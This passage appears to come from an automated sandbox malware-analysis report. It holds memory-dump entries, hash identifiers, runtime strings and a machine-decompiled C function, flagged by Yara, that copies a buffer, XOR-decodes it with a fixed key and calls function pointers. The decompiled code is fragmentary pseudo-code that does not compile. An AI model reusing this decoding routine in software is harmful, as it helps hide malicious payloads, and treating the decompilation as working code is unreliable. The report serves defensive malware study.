                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: bad sweepgen in refillcall not at safe pointcannot allocate memorycompileCallabck: type duplicated defer entryfreeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: kernel32.dll not foundminpc or maxpc inv$out of memoryruntime: seq=runtime: val=srmount errortimer expiredtraceStackTabvalue method xadd64 failedxchg64 failed}sched={pc: but progSize nmidlelocked= on zero Value out of range procedure in to finalizer untyped args -thread limitCertCloseStoreCrea$refill of span with free space remainingruntime.SetFinalizer: first argument is runtime.preemptM: duplicatehandle failedruntime: SyscallN has too many argumentsruntime: out of memory: cannot allocate runtime: typeBitsBulkBarrier with type attempted to add zer$span has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largewirep: invalid p state) must be a power of 2Argentina Standard TimeAstrakhan Standard TimeCertGetCertificateChainDestroyEnvironmentBlockE. Africa Sta
                                                                                                                            • API String ID: 0-1682056662
                                                                                                                            • Opcode ID: e146687736ced63c157d51feb45762b88ac8a1dfa13ced1b63844760e843ef55
                                                                                                                            • Instruction ID: 3313bd198654946911861dd86713aca611eaca9b1fc22be739ad903d004d869f
                                                                                                                            • Opcode Fuzzy Hash: e146687736ced63c157d51feb45762b88ac8a1dfa13ced1b63844760e843ef55
                                                                                                                            • Instruction Fuzzy Hash: 7B51AF72205B9186DB14DF09E4903AE7B65F388B98F984122DB8E13B78DF3CC58AC750
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 49%
                                                                                                                            			E0000025B25BF8A63700(signed int __edx, intOrPtr __ebp, void* __eflags, long long __rbx, void* __rcx, long long __rsi, long long __rbp, void* __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
                                                                                                                            				void* _v40;
                                                                                                                            				char _v56;
                                                                                                                            				long long _v72;
                                                                                                                            				void* _t46;
                                                                                                                            				void* _t54;
                                                                                                                            				char _t58;
                                                                                                                            				void* _t66;
                                                                                                                            				void* _t69;
                                                                                                                            				void* _t71;
                                                                                                                            				signed long long _t89;
                                                                                                                            				void* _t105;
                                                                                                                            				void* _t107;
                                                                                                                            				void* _t116;
                                                                                                                            
                                                                                                                            				_a8 = __rbx;
                                                                                                                            				_a16 = __rbp;
                                                                                                                            				_a24 = __rsi;
                                                                                                                            				_t107 = __rcx;
                                                                                                                            				if (E0000025B25BF8A6351C(__ebp) != 0) goto 0xf8a6386d;
                                                                                                                            				 *((intOrPtr*)(_t107 + 0x70)) = __ebp;
                                                                                                                            				_t89 = __edx << 7;
                                                                                                                            				r15d =  *((intOrPtr*)(_t89 + 0x25bf8aa511c));
                                                                                                                            				if (r9d != 0) goto 0xf8a6375b;
                                                                                                                            				goto 0xf8a6386d;
                                                                                                                            				r12d =  *((intOrPtr*)(_t89 + 0x25bf8aa5120));
                                                                                                                            				malloc(??);
                                                                                                                            				if (0xf8aa5110 != 0) goto 0xf8a63779;
                                                                                                                            				goto 0xf8a6386d;
                                                                                                                            				_t46 = malloc(??);
                                                                                                                            				 *((long long*)(_t107 + 0xe8)) = 0xf8aa5110;
                                                                                                                            				if (0xf8aa5110 != 0) goto 0xf8a63795;
                                                                                                                            				goto 0xf8a63863;
                                                                                                                            				_t58 =  *((intOrPtr*)(_t89 + 0x25bf8aa5120));
                                                                                                                            				if (0x25bf8aa511d - _t58 <= 0) goto 0xf8a637e6;
                                                                                                                            				_v56 = _t58;
                                                                                                                            				_v72 =  &_v56;
                                                                                                                            				r8d = 0x25bf8aa511d;
                                                                                                                            				0xf8a60cbc();
                                                                                                                            				_t66 = _t46;
                                                                                                                            				if (_t46 != 0) goto 0xf8a63857;
                                                                                                                            				if (r15d -  *((intOrPtr*)(_t89 + 0x25bf8aa5120)) >= 0) goto 0xf8a6380d;
                                                                                                                            				goto 0xf8a63806;
                                                                                                                            				_t116 = _t105;
                                                                                                                            				E0000025B25BF8A797B0(__ebp, _t66, _t69, _t71, 0xf8aa5110, __r8, _t116);
                                                                                                                            				if (_t66 -  *((intOrPtr*)(_t89 + 0x25bf8aa5120)) >= 0) goto 0xf8a6380d;
                                                                                                                            				E0000025B25BF8A634DC(__r8);
                                                                                                                            				r8d = 0;
                                                                                                                            				if ( *((intOrPtr*)(_t89 + 0x25bf8aa5120)) - r8d <= 0) goto 0xf8a63833;
                                                                                                                            				 *(_t116 + 0xf8aa5110) =  *( *((intOrPtr*)(_t107 + 0xe8)) + _t116) ^ 0x00000036;
                                                                                                                            				r8d = r8d + 1;
                                                                                                                            				if (r8d -  *((intOrPtr*)(_t89 + 0x25bf8aa5120)) < 0) goto 0xf8a63817;
                                                                                                                            				if ( *((intOrPtr*)(_t89 + 0x25bf8aa5168))() != 0) goto 0xf8a63857;
                                                                                                                            				r8d =  *((intOrPtr*)(_t89 + 0x25bf8aa5120));
                                                                                                                            				_t54 =  *((intOrPtr*)(_t89 + 0x25bf8aa5170))();
                                                                                                                            				if (_t54 == 0) goto 0xf8a63863;
                                                                                                                            				free(??);
                                                                                                                            				free(??);
                                                                                                                            				return _t54;
                                                                                                                            			}

















                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2803490479-0
                                                                                                                            • Opcode ID: c5ac0f331414c1297a2cc589be8016456c32ba5b3f089af23cd131535af8feed
                                                                                                                            • Instruction ID: d25b8e62018cade0e33e999acbf7f120c374f52c56528f865ab2f9768bc6ba85
                                                                                                                            • Opcode Fuzzy Hash: c5ac0f331414c1297a2cc589be8016456c32ba5b3f089af23cd131535af8feed
                                                                                                                            • Instruction Fuzzy Hash: 33419323600E4187EF56DB269C087AD73A1F744BA6F645425FE1A47F89DF38D8068714
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%